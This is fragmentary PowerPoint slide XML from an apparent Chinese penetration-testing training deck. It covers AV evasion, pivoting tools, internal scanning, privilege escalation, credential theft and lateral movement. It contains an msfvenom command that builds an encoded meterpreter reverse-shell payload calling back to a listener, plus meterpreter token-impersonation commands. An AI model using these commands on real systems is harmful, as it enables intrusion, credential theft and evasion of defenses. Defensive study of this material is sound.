              <a:t>上相互独立，降低被检测、关联、回溯的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>概率</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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攻防关键技术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077686"/>
            <a:ext cx="8372163" cy="332159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隐蔽探测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1800" dirty="0" smtClean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常见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的免杀方法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wmic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/>
              <a:t>P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owershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>白</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>直接将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>注入到内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Invoke-shellcode.ps1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Msfvemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>免杀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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>-p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>meterpreter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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t> -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t> -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 12 -b '/x00' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>=192.168.1.160 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>=7777 -f c -o /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>home/shell/test01.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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攻防关键技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="https://klionsec.github.io/img/invoke%20shellco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08" y="2245722"/>
            <a:ext cx="6670107" cy="12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è¿éåå¾çæè¿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8" y="4158330"/>
            <a:ext cx="4020812" cy="261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344160" y="4594838"/>
            <a:ext cx="2050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-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>payload </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>选择使用的编码 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>编码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>次数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>避免出现的字符 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>输出文件类型 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>输出文件目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 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077686"/>
            <a:ext cx="8372163" cy="3697514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隐蔽探测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1800" dirty="0" smtClean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ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>边界转发与代理工具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lcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>：基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>套接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>字的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>转发，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>linux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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>htran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>工具移植到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>平台</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>一款在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>下可以实现全局代理的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>软件，可多级代理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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reGeorg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>reDuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>的升级版，把内网服务器的端口通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>http/https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>隧道转发</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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pivot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>中最常用的一种代理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>，代理到内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>环境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内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网扫描：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600" dirty="0"/>
              <a:t>低频率、不落地</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>无文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Invoke-Portscan.ps1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攻防关键技术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26" y="3630612"/>
            <a:ext cx="4463894" cy="30206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2386" y="5140960"/>
            <a:ext cx="3769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关键参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-Hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>指定要扫描的主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-Ports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>指定要扫描的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Sleeptimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>指定休眠时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>在内网中极其重要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>)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横向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拓展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权限提升、用户口令或身份令牌窃取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>、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横向移动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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>提升的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方法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	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通过系统漏洞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提权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各种本地提权漏洞，如脏牛；或者远程高权限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RCE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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	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通过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第三方服务提权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MYSQL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、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MSSQL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….)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	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利用操作系统各种机制提权（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Hot-potato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NTLM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重放和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NBNS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欺骗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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean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800" b="1" dirty="0"/>
              <a:t>高权限账户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>驻留</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>                Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>攻击：公开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>MS14-068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0" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef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                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>域控上生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Golden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>黄金票据</a:t>
            </a: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1800" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>者通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Golden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>随时可以获取域控制器的访问权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>防：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zh-CN" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>重置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>账户密码，且需要重置两次，才能使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>golden ticket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失效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zh-CN" sz="1800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>参见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.varonis.com/blog/kerberos-how-to-stop-golden-tickets/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用户身份令牌窃取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b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>读取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>口令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>icognito</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>模块来模拟其他用户的身份令牌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>icognito</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>icognito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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>列举</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以伪造的身份令牌：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>list_tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>u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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户身份令牌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>impersonate_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CTFTEST\\administrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN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86" y="2274472"/>
            <a:ext cx="4490954" cy="175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9" y="4409551"/>
            <a:ext cx="4328161" cy="1821594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横向移动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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PSEXEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：当拿到用户口令之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可直接启动一个该用户权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>即通过使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>系统中默认启动的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>共享，来达到侵略主机，获得计算机控制权的入侵。在内网中极其常见</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0"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lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>PSEXEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>：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zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>模块下的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
